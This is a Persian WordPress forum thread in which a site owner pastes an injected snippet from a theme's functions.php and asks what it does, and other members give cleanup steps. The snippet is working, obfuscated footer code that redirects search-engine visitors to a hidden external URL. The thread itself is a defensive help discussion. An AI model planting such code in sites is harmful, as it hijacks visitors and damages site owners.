انجمن


ویروسی شدن وردپرس  (۱۲ نوشته)

  • silencebitter

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۱
    # نوشته شده: ۹ سال پیش
    ۴ اسفند ۱۳۹۰ - ۱۴:۲۲

    سلام دوستان عزیز
    امروز در یک انجمن عنوان شده که آنتی ویروس ها وب سایت من را مسدود میکنند بخاطر ویروسی بودن آن
    سایت : http://www.1itnews.com
    تصویر :
    http://www.img4up.com/up2/69711052543490334757.png
    از مسئول هاست جویا شدم مشکل رو گفتن این کد را از آخر فایل
    functions.php
    پوسته حذف کنم
    این کد را :

    <?php
    add_action('get_footer', 'add_sscounter');
    	function add_sscounter(){
    		echo '<!--scounter-->';
    		if(function_exists('is_user_logged_in')){
    			if(time()%2 == 0 && !is_user_logged_in()){
    				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
    			}
    		}
    	}
    ?>

    این کد مربوط به چی هست؟
    آیا با حذف این کد مشکلی در سیستم بوجود خواهد آمد؟

  • omid0098

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۳۵۳
    تشکر شده: ۱۱۹۴ بار
    # نوشته شده: ۹ سال پیش
    ۴ اسفند ۱۳۹۰ - ۱۵:۳۸

    سلام
    چه کدهای درهمی !
    خب حذفشون کنید اگه مشکلی پیش اومد باز اینجا مطرح کنید.

    موفق باشید

  • silencebitter

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۱
    # نوشته شده: ۹ سال پیش
    ۴ اسفند ۱۳۹۰ - ۱۶:۱۲

    omid0098 گفت:
    سلام
    چه کدهای درهمی !
    خب حذفشون کنید اگه مشکلی پیش اومد باز اینجا مطرح کنید.

    موفق باشید

    من حذف کردم مشکلی هم پیش نیومده فقط چون پشتیبانی هاست گفته در این هفته سیستم های وردپرسی مشکل پیدا کردن و شما این کد رو حذف کنید گفتم شاید دوستان خبر داشته باشن میخواستم ببینم این کد جاوا اسکریپت چیکار میکنه؟
    ممنون

  • Saeed Fard

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۹۸۲
    تشکر شده: ۱۶۱۵ بار
    # نوشته شده: ۹ سال پیش
    ۴ اسفند ۱۳۹۰ - ۱۷:۱۲

    میخواستم ببینم این کد جاوا اسکریپت چیکار میکنه؟

    درود ;
    کاملا مشخص هستش که ویروسه ،

    این تاپیک هارو هم مطالعه کن :

    http://forum.wp-persian.com/topic/19787
    http://forum.wp-persian.com/topic/19754

    موفق باشید ../.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    silencebitter - Morteza - master AK
  • progpars

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۷
    تشکر شده: ۵ بار
    # نوشته شده: ۹ سال پیش
    ۴ اسفند ۱۳۹۰ - ۲۲:۲۹

    بله پاک کنید این کد رو . من خیلی وقت پیش تو وبم گفته بودم قضیه این تورجان چیه و این کدها به صورت خودکار اضافه میشن به functions.php

    لینک

  • Saeed Fard

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۹۸۲
    تشکر شده: ۱۶۱۵ بار
    # نوشته شده: ۹ سال پیش
    ۵ اسفند ۱۳۹۰ - ۱۲:۵۸

    درود ;

    از دوستان عزیزم آقا مصطفی یا آقا مرتضی عزیز درخواست دارم در صورت دیدن این تاپیک لطفا کد هایی که آقای silencebitter در پست اول قرار دادند رو درون Code قرار بدند ، چون در این حالت در حالت اجرایی قرار گرفته و آنتی ویروس صفحه رو بلاک میکنه ..

    موفق باشید ../.

  • fakhi

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۰
    # نوشته شده: ۹ سال پیش
    ۷ اسفند ۱۳۹۰ - ۲۰:۰۳

    سلام دوستان من این کد رو حذف کردم ولی دوباره بر می گرده مشکل کجاست ؟؟

  • Saeed Fard

    آفلاین
    ناظم
    تعداد نوشته‌ها: ۹۸۲
    تشکر شده: ۱۶۱۵ بار
    # نوشته شده: ۹ سال پیش
    ۸ اسفند ۱۳۹۰ - ۱۳:۱۶

    سلام دوستان من این کد رو حذف کردم ولی دوباره بر می گرده مشکل کجاست ؟؟

    ساير قسمت‌هاي پوسته و ساير فايل‌ها رو چك كن كه آيا بازم در جاهايه ديگه‌اي اين كد وجود داره يا نه ؟ حتما هست .. همچنين آنتي ويروس Eset تو صفحه‌اي كه بلاك ميكنه مشخص ميكنه كه فايل ويروسي در كدوم فايل يا پوشه قرار داره و به اين ترتيب ميتونيد از پوشه يا فايل ويروسي اطلاع پيدا كنيد و توش دنبال اين كد بگرديد و پاكش كنيد ..

    موفق باشيد ../.

  • javedan

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۲
    # نوشته شده: ۹ سال پیش
    ۲۰ فروردین ۱۳۹۱ - ۲۲:۴۲

    ببخشید من هم پیدا نکردم وهمه می گن سایتم تروجان داره و درجاهای دیگر هم دیدم این فقط ادرس سایت رو گفته دیگه چیزی نگفته .
    لطفا کمک.

  • javedan

    آفلاین
    عضو
    تعداد نوشته‌ها: ۱۲
    # نوشته شده: ۹ سال پیش
    ۲۱ فروردین ۱۳۹۱ - ۱۹:۰۹

    ببخشید من حذف میکنم ولی باز هم اضافه می شود

  • silencebitter

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۱
    # نوشته شده: ۹ سال پیش
    ۲۷ فروردین ۱۳۹۱ - ۲۱:۳۵

    امیدوارم مفید باشه
    دوستان عزیز برای رفع این مشکل من یه طرحی رو امتحان کردم
    ابتدا کل پوشه پوسته ای که ویروسی شده بود رو حذف کردم بعد از اون فایل اولیه پوسته رو آوردم "توجه کنید پوسته اولیه من ویروسی نبود"بعد فایل اولیه پوسته رو جایگزین کردم و تا حالا هنوز این ویروس بر نگشته !
    مسئولیت حذف پوسته و احیانا مشکلاتی که بوجود بیاد با خود کاربر هست و من فقط یک راه رو شرح دادم
    پس
    1- حذف پوسته ویروسی.
    2-جایگزینی پوسته اولیه که سالم هست.
    موفق باشید.

  • kits

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲۲۵
    تشکر شده: ۷۰ بار
    # نوشته شده: ۹ سال پیش
    ۲۸ فروردین ۱۳۹۱ - ۰۰:۲۱

    سلام
    اینیکه میگم تجربه حدود 3 ماهه هست که دنبال ویروس سایتم بودم
    علاوه بر کارهای بالا این کار را هم بکن
    فایل wp-config.php را هم نگاه کن این فایل حجمش باید حداکثر حدودای 3.2 کیلو بایت باشه اگه بیشتر بود مثلا بالای 4 کیلو ،محل اصلی ویرمس اینجاست
    جالبه که اینقدر حجم فایلیت زیاد میشه که بعد از کد های اصلی حدود 2 تا 3 هزار خط خالی هست و بعدش یهو کد ویروسو میبینی که باید حذف کنی
    در ضمن ویروس برروی افزونه ها هم میشینه کافیه از طریق مدیریت بری به بخش افزونه ها تاببینی یهو همش غیر فعال میشه

    تو خط اول همه فایل های php ویروس میشینه و در خط آخر فایل های جاوا اسکریپت های که تو هاستت باشه
    بهترین کار اول حذف پوشه افزونه plugin و theme هست و بعد نصب دوباره افزونه ها از طریق مدیریت که همه افزونه ها از سایت اصلی وردپرس wordpress.org باشه و گذاشتن دوباره همه قالب های مورد نیاز

    در ضمن بازم تاکید میکنم فایل کانفیگ wp-config.php را ویرایشش کن و بعد ورد پرس را هم از طریق مدیریت در بخش بروز رسانی بزن راه اندازی مجدد تا فایل های هسته اصلی وردپرس هم دوباره تجدید بشه و سالم بشه

    امیدوارم اینا به دردت بخوره

    یاعلی

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    silencebitter

درباره‌ی این موضوع



برچسب‌ها

هیچ برچسبی نیست.